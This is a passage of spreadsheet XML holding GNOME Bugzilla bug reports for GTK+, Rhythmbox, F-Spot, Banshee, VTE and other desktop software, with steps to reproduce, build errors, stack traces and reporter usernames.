        v_uint64 = 583090360878060768 v_float = 4.55396797e-34 
        v_double = 1.1145819083899695e-269 v_pointer = 0x81754e0} {
        v_int = 134669709 v_uint = 134669709 v_long = 134669709 
        v_ulong = 134669709 v_int64 = 583027997951845773 
        v_uint64 = 583027997951845773 v_float = 4.05939939e-34 
        v_double = 1.1040973392738667e-269 v_pointer = 0x806e58d}}} {
    g_type = 135761304 data = {{v_int = -1073748904 v_uint =
3221218392 
        v_long = -1073748904 v_ulong = 3221218392 
        v_int64 = 578401629770867800 v_uint64 = 578401629770867800 
        v_float = -1.999156 v_double = 5.4172863284821657e-270 
        v_pointer = 0xbfffe458} {v_int = 136061576 v_uint = 136061576
        v_long = 136061576 v_ulong = 136061576 v_int64 = 136061576 
        v_uint64 = 136061576 v_float = 4.69851337e-34 
        v_double = 6.7223350420617851e-316 v_pointer = 0x81c2288}}} {
    g_type = 1083909984 data = {{v_int = 1 v_uint = 1 v_long = 1 
        v_ulong = 1 v_int64 = 4294967297 v_uint64 = 4294967297 
        v_float = 1.40129846e-45 v_double = 2.121995791459338e-314 
        v_pointer = 0x1} {v_int = 135761304 v_uint = 135761304 
        v_long = 135761304 v_ulong = 135761304 
        v_int64 = -4611716151782175336 v_uint64 = 13835027921927376280
        v_float = 4.56063523e-34 v_double = -1.9933090511411589 
        v_pointer = 0x8178d98}}} {g_type = 134711254 data = {{
        v_int = 136061736 v_uint = 136061736 v_long = 136061736 
        v_ulong = 136061736 v_int64 = 584380706493047592 
        v_uint64 = 584380706493047592 v_float = 4.69858684e-34 
        v_double = 1.3315171711348488e-269 v_pointer = 0x81c2328} {
        v_int = 135761304 v_uint = 135761304 v_long = 135761304 
        v_ulong = 135761304 v_int64 = 578580116936297880 
        v_uint64 = 578580116936297880 v_float = 4.56063523e-34 
        v_double = 5.5673242705631272e-270 v_pointer = 0x8178d98}}} {
    g_type = 13606157</t>
  </si>
  <si>
    <t>michiel</t>
  </si>
  <si>
    <t>GNOME-SESSION-88841</t>
  </si>
  <si>
    <t>Sessions if opened in Edit mode gives an error message when pressed OK without making any changes</t>
  </si>
  <si>
    <t>Tested on July 15th sources
Reproducibility: Always
Description:
Sessions if opened in Edit mode gives an error message when pressed OK 
without making any changes.
Steps:
1. Invoke session properties window
2. Go to the Session Options tab
3. Select any existing session from the list and click on the Edit button
4. Do not make any change and press OK button.
It gives an error message saying that the session with the name already 
exists and can not be added. This actually should not happen if opened in 
edit mode(even though Cancel button is present). now both Add 
and Edit button behaves in the same way.</t>
  </si>
  <si>
    <t>GTK+-86587</t>
  </si>
  <si>
    <t>gtk+ fails to get build for the latest cvs head - 27 Jun 2002</t>
  </si>
  <si>
    <t>gtk+ fails to get build with the following error in Linux with the 
following error. The header file gdk/gdkenumtypes.h seems to be missing 
which causes this failure. 
gcc -DHAVE_CONFIG_H -I. -I. -I../.. -DG_LOG_DOMAIN=\Gdk\ -
DINSIDE_GDK_X11 -I..
/.. -I../../gdk -I../../gdk -DG_ENABLE_DEBUG -D_REENTRANT -I/opt/gnome-
2.0/inclu
de/glib-2.0 -I/opt/gnome-2.0/lib/glib-2.0/include -I/opt/gnome-
2.0/include/pango
-1.0 -I/opt/gnome-2.0/include/freetype2 -I/opt/gnome-2.0/include -g -
I/opt/gnome
-2.0/include -Wall -Wp-MD.deps/gdkcolor-x11.pp -c gdkcolor-x11.c  -fPIC -
DPIC
-o gdkcolor-x11.o
In file included from ../../gdk/x11/gdkdisplay-x11.h:33
                 from gdkprivate-x11.h:38
                 from gdkx.h:75
                 from gdkcolor-x11.c:31:
../../gdk/gdk.h:35:30: gdk/gdkenumtypes.h: No such file or directory
make[3]: *** [gdkcolor-x11.lo] Error 1
make[3]: Leaving directory `/gnome-build/2.0/nightly/src-2.0n-
270602/gtk+/gdk/x1
1'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/gnome-build/2.0/nightly/src-2.0n-
270602/gtk+/gdk'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/gnome-build/2.0/nightly/src-2.0n-270602/gtk+'
make: *** [all-recursive-am] Error 2
---&gt;8--- output of make command ends ------
ERROR: Failed to compile package gtk+ (2)</t>
  </si>
  <si>
    <t>METACITY-98119</t>
  </si>
  <si>
    <t>Fullscreen Headache</t>
  </si>
  <si>
    <t>I like to keep galeon open in fullscreen mode on it's own workspace. But if
a gaim window pops up while I'm on that workspace I never see it. If I put
gaim on all workspaces I can alt-tab to it but all I ever see is the
outline of the window. When I release alt-tab the outline disappears
without presenting the gaim window. The only way to expose the other
windows is to move out of fullscreen mode.
It's hard to say what the correct behavior should be. Maybe fullscreen
windows should be treated as their own workspaces where only transients of
that window can cohabitate.</t>
  </si>
  <si>
    <t>GALEON-94263</t>
  </si>
  <si>
    <t>Context menu and toolbar/menubar buttons act different</t>
  </si>
  <si>
    <t>In the bookmarks editor 'New folder' behaves differently when used from
context menu than it does from toolbar or menubar.
Using the context menu the new folder is added to the end of the selected
folder.  Using the toolbar or menubar the new folder is added immediately
below the currently selected item.
In the bookmarks toolbar the behavior of context menu is propably the right
thing to do but in the editor it's just weird.  The least the editor could
do is to automatically jump to the new folder so that it's clear where it
was added it's quite easy to add a folder outside the visible area.</t>
  </si>
  <si>
    <t>GTK+-70453</t>
  </si>
  <si>
    <t>Warning in gtksignal.h</t>
  </si>
  <si>
    <t>If you turn on -Wshadow gcc warns about const gchar *signal in function 
prototypes:
/home/hp/unst/include/gtk-2.0/gtk/gtksignal.h:109: warning: declaration of
`signal' shadows global declaration
/home/hp/unst/include/gtk-2.0/gtk/gtksignal.h:113: warning: declaration of
`signal' shadows global declaration
Should rename to signal_name just for orderliness.</t>
  </si>
  <si>
    <t>BONOBO-352191</t>
  </si>
  <si>
    <t>libbonoboui's interface doesn't seem to depend on ORBit and libxml</t>
  </si>
  <si>
    <t>Hi
In libbonoboui-2.0.pc.in one can read
Requires: glib-2.0 ORBit-2.0 libxml-2.0 libbonobo-2.0 libgnomecanvas-2.0 libgnome-2.0
But when reading libbonoboui headers one can't find a single mention of orbit or libxml. Bonoboui itself uses them but it shouldn't expose them externally (since that imposes a spurious dependency). The libbonoboui dependency should hence be split into
Requires: glib-2.0 libbonobo-2.0 libgnomecanvas-2.0 libgnome-2.0
Requires.private: ORBit-2.0 libxml-2.0</t>
  </si>
  <si>
    <t>GTK+-133997</t>
  </si>
  <si>
    <t>gtk_combo_box_cell_layout_clear_attributes</t>
  </si>
  <si>
    <t>(Please look carefully at the function names here.  A similar problem was
fixes elsewhere recently.)
gtk_combo_box_cell_layout_clear_attributes does
  g_slist_foreach (info-&gt;attributes (GFunc)g_free NULL)
to get rid of a list of pointes/integers allocated in
gtk_combo_box_cell_layout_add_attribute.
This also suggests that gtk_combo_box_cell_layout_clear_attributes has
never been called right.  Shouldn't gtk_combo_box_finalize call it?</t>
  </si>
  <si>
    <t>RHYTHMBOX-327045</t>
  </si>
  <si>
    <t>rhythmbox 0.9.2 crashes when i try to change the sorting order</t>
  </si>
  <si>
    <t>rhythmbox playing in shuffle mode only recently after adding more songs im now just under 1000 songs has started crashing spontaneously but mostly when i try to change the sorting but sometime when changing songs always the same error.
$ rhythmbox
[assert] error: 111 (Connection refused)
[assert] where: socket.c sw_socket_tcp_connect line: 720
(rhythmbox:30155): Rhythmbox-WARNING **: Unable to start mDNS browsing
art_render_invoke: no image source given
art_render_invoke: no image source given
Rhythmbox-ERROR **: file rb-play-order-shuffle.c: line 346 (rb_shuffle_sync_history_with_entry_view): assertion failed: (entry_view_and_history_contents_match (sorder))
aborting...</t>
  </si>
  <si>
    <t>jbergler</t>
  </si>
  <si>
    <t>GTK+-378158</t>
  </si>
  <si>
    <t>gdk_win32_selection_add_targets uses uninitialized hwnd variable</t>
  </si>
  <si>
    <t>gtk+/gdk/gdkselection-win32.c : gdk_win32_selection_add_targets
If owner == NULL then OpenClipboard is called with an uninitialized hwnd variable. I do not know how and where to fix it though.
See attached test case for a quick way to see the warning gdk spits out because of the failed OpenClipboard API call.
GnuCash uses gtkhtml to create its reports but in gtkhtml/src/gtkhtml.c:gtk_html_init gtk_selection_add_targets is called with widget-&gt;window probably being NULL. GnuCash used to crash immediately after this warning but I did not manage to debug that so it may be independent of this bug.</t>
  </si>
  <si>
    <t>GIMMIE-492771</t>
  </si>
  <si>
    <t>crash in Gimmie: open gimmie</t>
  </si>
  <si>
    <t>What were you doing when the application crashed?
open gimmie
Distribution: Ubuntu 7.04 (feisty)
Gnome Release: 2.18.1 2007-04-10 (Ubuntu)
BugBuddy Version: 2.18.1
System: Linux 2.6.20-15-generic #2 SMP Sun Apr 15 07:36:31 UTC 2007 i686
X Vendor: The X.Org Foundation
X Vendor Release: 70200000
Selinux: No
Accessibility: Disabled
GTK+ Theme: Bea
Icon Theme: Bea
Memory status: size: 0 vsize: 0 resident: 0 share: 0 rss: 0 rss_rlim: 0
CPU usage: start_time: 0 rtime: 0 utime: 0 stime: 0 cutime:0 cstime: 0 timeout: 0 it_real_value: 0 frequency: 0
----------- .xsession-errors (127 sec old) ---------------------
kill: 1: No such process
--18:13:48--  http://www.linuxmint.com/repository/rules
           =&gt; `rules'
Risoluzione di www.linuxmint.com in corso... 85.25.140.189
Connessione a www.linuxmint.com|85.25.140.189:80... nm-applet: symbol lookup error: /usr/lib/pango/1.6.0/modules/pango-basic-fc.so: undefined symbol: pango_ot_ruleset_get_for_description
connesso.
HTTP richiesta inviata aspetto la risposta... 200 OK
Lunghezza: 731 [text/plain]
    0K                                                       100%   83.18 MB/s
18:13:48 (83.18 MB/s) - rules salvato [731/731]
--------------------------------------------------
Gimmie Version: 0.2.7
TypeError: () takes exactly 2 arguments (1 given)</t>
  </si>
  <si>
    <t>llllnz</t>
  </si>
  <si>
    <t>F-SPOT-334481</t>
  </si>
  <si>
    <t>Exception thrown when trying to import photo with Software: f-spot version 0.1.3 in metadata</t>
  </si>
  <si>
    <t>Please describe the problem:
Import fails with exception for any photos that have :
Software: f-spot version 0.1.3
in the metadata.
Steps to reproduce:
1. Find a photo with the following tag in its metadata:
Software: f-spot version 0.1.3
2. Try to import it.
3. Console window will show exception being thrown by Exif class.
Actual results:
Photo is not imported.
Expected results:
Photo is imported
Does this happen every time?
Yes
Other information:
Error importing /home/james/photos/temp/2006-03-05--16.04.01/00017.jpg
System.ArgumentNullException: Argument cannot be null.
Parameter name: src
in  
in (wrapper managed-to-native)
System.Runtime.InteropServices.Marshal:copy_from_unmanaged
(intptrintSystem.Arrayint)
in  System.Runtime.InteropServices.Marshal:Copy (IntPtr source
System.Byte[] destination Int32 startIndex Int32 length)
in  Exif.ExifEntry:get_Data ()
in  FSpot.JpegFile:get_Description ()
in  PhotoStore:Create (System.String newPath System.String origPath
Gdk.Pixbuf thumbnail)
in  FileImportBackend:Step (.Photo photo Gdk.Pixbuf thumbnail
System.Int32 count)
Could not import file</t>
  </si>
  <si>
    <t>james.fitzsimons</t>
  </si>
  <si>
    <t>GNOME-VFS-100422</t>
  </si>
  <si>
    <t>gnome-vfs using private symbol inet_aton</t>
  </si>
  <si>
    <t>gnome-vfs is using inet_aton which is a private symbol. I am attaching a
patch for this bug which changes inet_aton to inet_pton. Thanks</t>
  </si>
  <si>
    <t>GNOME-MEDIA-524099</t>
  </si>
  <si>
    <t>gnome-sound-recorder with the property dialog.</t>
  </si>
  <si>
    <t>When gnome-sound-recorder opens the the property dialog it crashes because the directory names are not UTF-8.
This is an additional fix of bug 483254.
I'm attaching the patch.</t>
  </si>
  <si>
    <t>F-SPOT-356898</t>
  </si>
  <si>
    <t>Latest semweb (0.75) do not work with F-Spot.</t>
  </si>
  <si>
    <t>A slight update.
1) I took a few days old f-spot tested and got the same error as I did yesterday (bug #356476).
2) I updated two f-spot files (XmpFile and MetadataStore) with Larrys patch for BaseURI.
--&gt; No error and it worked perfect.
3) I copied in the latest semweb .cs files and imported the same test photo as in bug #356476.
SemWeb.ParserException: rdf:RDF cannot be used as a property name.
  at SemWeb.RdfXmlReader.OnError (System.String message) [0x00000] 
  at SemWeb.RdfXmlReader.ParseProperty (SemWeb.Entity subject System.Int32 liIndex) [0x00000] 
  at SemWeb.RdfXmlReader.ParsePropertyNodes (SemWeb.Entity subject) [0x00000] 
  at SemWeb.RdfXmlReader.ParseDescription () [0x00000] 
  at SemWeb.RdfXmlReader.Select (StatementSink storage) [0x00000] 
  at SemWeb.Store.Import (StatementSource source) [0x00000] 
  at SemWeb.MemoryStore.Import (StatementSource source) [0x00000] 
  at FSpot.Xmp.XmpFile.Load (System.IO.Stream stream) [0x00000] 
and
System.InvalidOperationException: No namespace was registered and no prefix could be automatically generated for 
  at SemWeb.RdfXmlWriter.Normalize (System.String uri System.String prefix System.String localname) [0x00000] 
  at SemWeb.RdfXmlWriter.GetNode (SemWeb.Entity entity System.String type System.Xml.XmlElement context) [0x00000] 
  at SemWeb.RdfXmlWriter.Add (Statement statement) [0x00000] 
  at FSpot.Xmp.XmpFile+XmpWriter.Add (Statement stmt) [0x00000] 
  at SemWeb.RdfWriter.SemWeb.StatementSink.Add (Statement statement) [0x00000] 
  at SemWeb.MemoryStore.Select (Statement template StatementSink result) [0x00000] 
  at SemWeb.Store.Select (StatementSink result) [0x00000] 
  at SemWeb.RdfWriter.Write (StatementSource source) [0x00000] 
  at FSpot.Xmp.XmpFile.Save (System.IO.Stream stream) [0x00000] 
I posted this issue on semweb support forum (http://tech.groups.yahoo.com/group/semweb-dotnet/messages) as well and got an answer 
--
That sounds like you didn't strip off the XMP-related document element (x:xmpmeta).
--
I think this is more an issue with semweb since the same photo and f-spot code was used in test 2 and only difference between test 2 and test 3 is the semweb .cs files.</t>
  </si>
  <si>
    <t>BANSHEE-401352</t>
  </si>
  <si>
    <t>When I try to access the Web Resources</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Start Banshee
2. Access with Audioscrobbler or Music Recommendations at the Web
3. Crash
Stack trace:
Se produjo una excepciÃ³n no tratada: Hubo un error al lanzar el comando de acciÃ³n predeterminado asociado con esta ubicaciÃ³n.
  at Gnome.Url.Show (System.String url) [0x00000] 
  at Banshee.Plugins.Recommendation.RecommendationPane+AnonHelp.2 (System.Object +0 System.EventArgs +1) [0x00000] 
  at (wrapper delegate-invoke) System.MulticastDelegate:invoke_void_object_EventArgs (objectSystem.EventArgs)
  at GLib.Signal.voidObjectCallback (IntPtr handle IntPtr gch) [0x00000] 
  at (wrapper native-to-managed) GLib.Signal:voidObjectCallback (intptrintptr)
  at  
  at (wrapper managed-to-native) Gtk.Application:gtk_main ()
  at Gtk.Application.Run () [0x00000] 
  at Banshee.BansheeEntry.Startup (System.String[] args) [0x00000] 
  at (wrapper delegate-invoke) System.MulticastDelegate:invoke_void_string[] (string[])
  at Banshee.Gui.CleanRoomStartup.Startup (Banshee.Gui.StartupInvocationHandler startup System.String[] args) [0x00000] 
.NET Version: 2.0.50727.42
Assembly Version Information:
System.Web (2.0.0.0)
System.Configuration (2.0.0.0)
Recommendation (0.11.1.0)
Podcast (0.11.1.0)
NotificationAreaIcon (0.11.1.41236)
MiniMode (0.11.1.0)
MusicBrainz (0.11.1.41226)
MetadataSearch (0.11.1.41235)
MMKeys (0.11.1.41236)
avahi-sharp (1.0.0.0)
Daap (0.11.1.41235)
Banshee.Plugins.Audioscrobbler (0.11.1.41234)
ipod-sharp-ui (0.0.1.0)
njb-sharp (0.3.0.27013)
Banshee.Dap.Njb (0.11.1.41233)
gnome-vfs-sharp (2.16.0.0)
Banshee.Dap.MassStorage (0.11.1.41233)
ipod-sharp (0.0.1.0)
Banshee.Dap.Ipod (0.11.1.41232)
GStreamerPlayerEngine (0.11.1.41231)
System.Xml (2.0.0.0)
System.Data (2.0.0.0)
Mono.Data.SqliteClient (2.0.0.0)
pango-sharp (2.10.0.0)
Mono.Cairo (2.0.0.0)
Hal (0.0.0.0)
Last.FM (0.0.0.0)
NDesk.DBus (0.0.0.0)
Mono.Posix (2.0.0.0)
Banshee.Widgets (0.11.1.41228)
glade-sharp (2.10.0.0)
gnome-sharp (2.16.0.0)
gconf-sharp (2.16.0.0)
NDesk.DBus.GLib (0.0.0.0)
gdk-sharp (2.10.0.0)
System (2.0.0.0)
atk-sharp (2.10.0.0)
glib-sharp (2.10.0.0)
gtk-sharp (2.10.0.0)
Banshee.Base (0.11.1.41231)
banshee (0.11.1.41238)
mscorlib (2.0.0.0)
Platform Information: Linux 2.6.17-10-generic i686 unknown GNU/Linux
Disribution Information:
[/etc/debian_version]
testing/unstable
[/etc/lsb-release]
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=6.10
DISTRIB_CODENAME=edgy
DISTRIB_DESCRIPTION=Ubuntu 6.10
Other information:</t>
  </si>
  <si>
    <t>joviedo</t>
  </si>
  <si>
    <t>GTKVTS-66962</t>
  </si>
  <si>
    <t>doc_parser doesn't generate assertions for gtk_plug_construct()</t>
  </si>
  <si>
    <t>RHYTHMBOX-346773</t>
  </si>
  <si>
    <t>maybe enable burn-proof for creating audio cds</t>
  </si>
  <si>
    <t>Back in n-c-b 2.12 we enabled burn-proof by default for all data disc creation.  We did not enable it for audio CD creation in RB due to concerns about introducing audible errors.
http://en.wikipedia.org/wiki/BurnProof#Buffer_underrun_protection
It is hard to get data on how many burn failures occur due to not having burn-proof enabled.  However I suspect that there are quite a lot.
So we should probably enable burn-proof if we can answer the following questions adequately:
1. Is our prresumption correct that audible errors occur when burn proof kicks in?
2. How significant are these errors?
3. If we enable burn-proof should we report how many times burn-proof kicked in and recommend reburning at a slower speed to avoid the errors?
4. Are discs with audible errors preferable to coasters?
4. Is almost always true if 3 is true and time is not a concern.</t>
  </si>
  <si>
    <t>GTK+-64500</t>
  </si>
  <si>
    <t>Does not find jpeglib although it is there</t>
  </si>
  <si>
    <t>I tried to compile gtk+ 1.3.10. I believe I met the dependencies:
:/usr/include$ ls -l jpeglib.h 
  48 -rw-r--r--   1 root     root        46205 Feb 21  1998 jpeglib.h
:/usr/lib$ ls -l libjpeg*
 168 -rw-r--r--   1 root     root       164492 Jul 14  1999 libjpeg.a
   0 lrwxrwxrwx   1 root     root           13 Nov 22  2000 libjpeg.so -&gt;
libjpeg.so.62*
   0 lrwxrwxrwx   1 root     root           17 Nov 22  2000 libjpeg.so.62
-&gt; libjpeg.so.62.0.0*
 144 -rwxr-xr-x   1 root     root       143036 Jul 14  1999 libjpeg.so.62.0.0*
I have GCC 2.95.3 GLIBC 2.2.4.
This is what configure says:
checking for jpeg_destroy_decompress in -ljpeg... yes
checking for jpeglib.h... no
configure: warning: *** JPEG loader will not be built (JPEG header file not
found) ***
In config.log I find this:
configure:9374: checking for jpeglib.h
configure:9384: cc -E  conftest.c &gt;/dev/null 2&gt;conftest.out
In file included from /usr/include/jpeglib.h:24
                 from configure:9380:
/usr/include/jconfig.h:12: warning: `HAVE_STDLIB_H' redefined
confdefs.h:50: warning: this is the location of the previous definition
configure: failed program was:
#line 9376 configure
#include confdefs.h
#include 
#undef PACKAGE
#undef VERSION
#include 
This is mysterious. I often have had to pass --disable-more-warnings to
various programs although not since I upgraded GLIBC to 2.2.4. Never had
it happen through a configure script.
I also have compiled mainly applications that depend on jpeglib.</t>
  </si>
  <si>
    <t>PAN-90182</t>
  </si>
  <si>
    <t>Pan cvs fails to display article</t>
  </si>
  <si>
    <t>Pan cvs export of 08/08/2002 (latest changelog entry 2002-08-07  Charles 
Kerr) fails to display articles.
Since this cvs export i get with almost every article 'Some parts of this 
article may not display correctly' in the log viewer and I actually have 
messages that don't display at all.
Checking the local .pan/data/messages/cache folder doesn't show the 
message being stored either.
I can retrieve it with other clients and I've attached a copy of the 
message extracted from google.
Usual stuff attached.</t>
  </si>
  <si>
    <t>devilkin</t>
  </si>
  <si>
    <t>LIBGNOMEUI-61280</t>
  </si>
  <si>
    <t>GnomeAbout - signals for Ok button not connected?</t>
  </si>
  <si>
    <t>GnomeAbout - Is a signal not already connected to close the GnomeAbout
dialog when the user clicks the Ok button?</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-134171</t>
  </si>
  <si>
    <t>Strange message in gnome-background-properties.glade</t>
  </si>
  <si>
    <t>This message seems to be very strange. It also seems to be Albanian for
Pick a color (judging by sq.po -- I don't have a clue about Albanian). 
Since this message is translated anyway fixing this would not cause a
string freeze break.
#: capplets/background/gnome-background-properties.glade.h:4
msgid Zgjidh njÃ« ngjyrÃ«</t>
  </si>
  <si>
    <t>GTK+-105497</t>
  </si>
  <si>
    <t>const GdkColor</t>
  </si>
  <si>
    <t>The colour parameters of gdk_gc_set_rgb_fg_color and gdk_gc_set_rgb_bg_color
need to be const.</t>
  </si>
  <si>
    <t>WEBSITE-344550</t>
  </si>
  <si>
    <t>wiki.gnome.org</t>
  </si>
  <si>
    <t>Page style information not showing.</t>
  </si>
  <si>
    <t>Some sort of style information is lost when loading live.gnome.org.</t>
  </si>
  <si>
    <t>website-wiki-maint</t>
  </si>
  <si>
    <t>GAL-204162</t>
  </si>
  <si>
    <t>deleting message sometimes results in no selection</t>
  </si>
  <si>
    <t>I've only seen this happen when deleting the first message in a small
folder (maybe &lt; 10 messages? Maybe fewer messages than it takes to
fill up the message list pane?) with hide deleted messages selected.
Sometimes when I delete the first message instead of selecting the
new first message it selects nothing as though I'd deleted the last
message.
It also might only happen if threading is turned OFF.</t>
  </si>
  <si>
    <t>GNOME-SCREENSAVER-302344</t>
  </si>
  <si>
    <t>gnome-screensaver desktop support</t>
  </si>
  <si>
    <t>This is a tracking bug for gnome-screensaver desktop support.</t>
  </si>
  <si>
    <t>PANGO-101856</t>
  </si>
  <si>
    <t>PangoFT2 is unable to use fonts that have no Unicode mapping table</t>
  </si>
  <si>
    <t>WIth the latest cvs from 2002-12-22 I've got this error while trying to
load some fonts in the text tool :
** (gimp-1.3:31608): WARNING **: Unable to load unicode charmap from font
file /home/cjean/.fonts/sanka___.ttf
** (gimp-1.3:31608): WARNING **: Unable to open font file
/home/cjean/.fonts/sanka___.ttf for font Sanka 24 falling back to
/usr/X11R6/lib/X11/fonts/Type1/UTBI____.pfa
Some other ttf fonts are working great and in gnome2 ALL my ttf are ok</t>
  </si>
  <si>
    <t>cjean</t>
  </si>
  <si>
    <t>GTK+-68834</t>
  </si>
  <si>
    <t>GtkCombo works strangely.</t>
  </si>
  <si>
    <t>I use GTK+ for windows 2002-01-01 version prebuilt by Tor Lillqvist and
find a strange behavior of GtkCombo widget.
1) First I made a combo box which has three items.
The first(top) item string is a second is b third is c.
2) I clicked the button of the combo box to show the dropdown list and
selected the second item b.
3) Then I clicked the button again the selected item (b) is reset to the
top item a automatically.
This bug is occurred only on Windows version.</t>
  </si>
  <si>
    <t>okuno</t>
  </si>
  <si>
    <t>PANGO-392628</t>
  </si>
  <si>
    <t>Don't check for X on win32</t>
  </si>
  <si>
    <t>Attached patch removes check for X on win32 (native not cygwin) and makes it not warn on win32 if fontconfig not found (I believe xft and fontconfig can be used on windows).</t>
  </si>
  <si>
    <t>DOXYGEN-148567</t>
  </si>
  <si>
    <t>@todo section at comment end in combination with @copydoc</t>
  </si>
  <si>
    <t>I attach a simple file that produces the error message:
/home/bill/src/doxygen-bug/main.cpp:15: Error: Unexpected character `1'
I am aware of the fix for the problem of @todo section at the end of the doxygen
comment. This is generated with the combination of @copydoc and the previous
fixed case.
--- cut here
//! A class
/*!
A very important class
\todo we have a problem here
*/
class A
{
}
/*!
\copydoc A
*/
class B: public A
{
}</t>
  </si>
  <si>
    <t>vasvir</t>
  </si>
  <si>
    <t>TOTEM-433371</t>
  </si>
  <si>
    <t>Add support for activation failure</t>
  </si>
  <si>
    <t>It should be possible for plugins to fail the activation.</t>
  </si>
  <si>
    <t>BLUEFISH-330781</t>
  </si>
  <si>
    <t>savedir should be initially set to basedir when creating a new project</t>
  </si>
  <si>
    <t>There is an annoying issue: Create a new and empty project on a remote server.
Now create a file fill it with content and then try to save it. Because no file
was opened or saved opendir and savedir do not exist/are empty and bf tries to
save the file on the local filesystem which is not what I expect. I guess the
problem is caused by src/gtk_easy.c file_chooser_dialog() which states
if (bfwin-&gt;session-&gt;savedir)
file_chooser_set_current_dir(dialogbfwin-&gt;session-&gt;savedir)
else if (bfwin-&gt;session-&gt;opendir)
file_chooser_set_current_dir(dialogbfwin-&gt;session-&gt;opendir)
I suggest to add a fallback which then calls file_chooser_set_current_dir()
with the basedir value.
Opinions?
Other information:</t>
  </si>
  <si>
    <t>VTE-95187</t>
  </si>
  <si>
    <t>Terminal crashes while resizeing</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-terminal
Severity: critical
Version: 2.0.1
Synopsis: Terminal crashes while resizeing 
Bugzilla-Product: gnome-terminal
Bugzilla-Component: general
BugBuddy-GnomeVersion: 2.0 (2.0.3)
Description:
Description of Problem:
The terminal crash when I resized it. Pine was running in it and was
filtering mail.
Steps to reproduce the problem:
1. Start terminal
2. Start pine with a lot of mail (~400) to filter
3. Resize the terminal vertically
Actual Results:
Crash.
Expected Results:
The terminal should be longer.
How often does this happen?
Ones in a while
Additional Information:
Debugging Information:
Backtrace was generated from '/usr/bin/gnome-terminal'
(no debugging symbols found)...[New Thread 8192 (LWP 16628)]
0x420ae169 in wait4 () from /lib/i686/libc.so.6
#0  0x420ae169 in wait4 () from /lib/i686/libc.so.6
#1  0x4212a2d0 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x408f7c63 in waitpid () from /lib/i686/libpthread.so.0
#3  0x40241ff5 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
#4  0x408f947e in __pthread_sighandler () from
/lib/i686/libpthread.so.0
#5  
#6  0x42028cc1 in kill () from /lib/i686/libc.so.6
#7  0x408f607d in raise () from /lib/i686/libpthread.so.0
#8  0x4202a019 in abort () from /lib/i686/libc.so.6
#9  0x40949476 in g_logv () from /usr/lib/libglib-2.0.so.0
#10 0x409494b4 in g_log () from /usr/lib/libglib-2.0.so.0
#11 0x400425fe in vte_terminal_ensure_cursor () from
/usr/lib/libvte.so.2
#12 0x40047325 in vte_terminal_insert_char () from /usr/lib/libvte.so.2
#13 0x40048527 in vte_terminal_process_incoming () from
/usr/lib/libvte.so.2
#14 0x40943c83 in g_idle_dispatch () from /usr/lib/libglib-2.0.so.0
#15 0x40940f65 in g_main_dispatch () from /usr/lib/libglib-2.0.so.0
#16 0x40941f98 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#17 0x409422ad in g_main_context_iterate () from
/usr/lib/libglib-2.0.so.0
#18 0x40942a1f in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#19 0x4044439f in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#20 0x08058256 in main ()
#21 0x420158d4 in __libc_start_main () from /lib/i686/libc.so.6
Thread 1 (Thread 8192 (LWP 16628)):
#0  0x420ae169 in wait4 () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x4212a2d0 in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x408f7c63 in waitpid () from /lib/i686/libpthread.so.0
No symbol table info available.
#3  0x40241ff5 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
No symbol table info available.
#4  0x408f947e in __pthread_sighandler () from
/lib/i686/libpthread.so.0
No symbol table info available.
#5  
No symbol table info available.
#6  0x42028cc1 in kill () from /lib/i686/libc.so.6
No symbol table info available.
#7  0x408f607d in raise () from /lib/i686/libpthread.so.0
No symbol table info available.
#8  0x4202a019 in abort () from /lib/i686/libc.so.6
No symbol table info available.
#9  0x40949476 in g_logv () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#10 0x409494b4 in g_log () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#11 0x400425fe in vte_terminal_ensure_cursor () from
/usr/lib/libvte.so.2
No symbol table info available.
#12 0x40047325 in vte_terminal_insert_char () from /usr/lib/libvte.so.2
No symbol table info available.
#13 0x40048527 in vte_terminal_process_incoming () from
/usr/lib/libvte.so.2
No symbol table info available.
#14 0x40943c83 in g_idle_dispatch () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#15 0x40940f65 in g_main_dispatch () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#16 0x40941f98 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#17 0x409422ad in g_main_context_iterate () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#18 0x40942a1f in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#19 0x4044439f in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#20 0x08058256 in main ()
No symbol table info available.
#21 0x420158d4 in __libc_start_main () from /lib/i686/libc.so.6
No symbol table info available.
#0  0x420ae169 in wait4 () from /lib/i686/libc.so.6
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-10-08 11:16 -------
Reassigning to the default owner of the component hp@redhat.com.
</t>
  </si>
  <si>
    <t>EVOLUTION_EXCHANGE-260407</t>
  </si>
  <si>
    <t>[PATCH] Advance search is not working for some options in Exchange address book</t>
  </si>
  <si>
    <t>Description of Problem:
Advance search feature is not funtioning fully with all its features
Steps to reproduce the problem:
1. Go to contacts. Select exchange address book.
2. Give the search option Advanced.. with selecting the option Name
doesnot contains.
3. Click ok
Actual Results:
Evolution wont show any contacts which will fulfil that condition
Expected Results:
It should display all contacts satifies that condition
How often does this happen? 
Everytime
Additional Information:
Other options name ends in and name is notare also not working</t>
  </si>
  <si>
    <t>TOMBOY-375380</t>
  </si>
  <si>
    <t>Crashing when loading a modified NotOfTheDay</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Edit a newly created NodD note (make tomboy save it by editing it)
2. Restart Tomboy
3. Tomboy crashes
Stack trace:
Unhandled Exception: System.Exception: A note with this title already exists
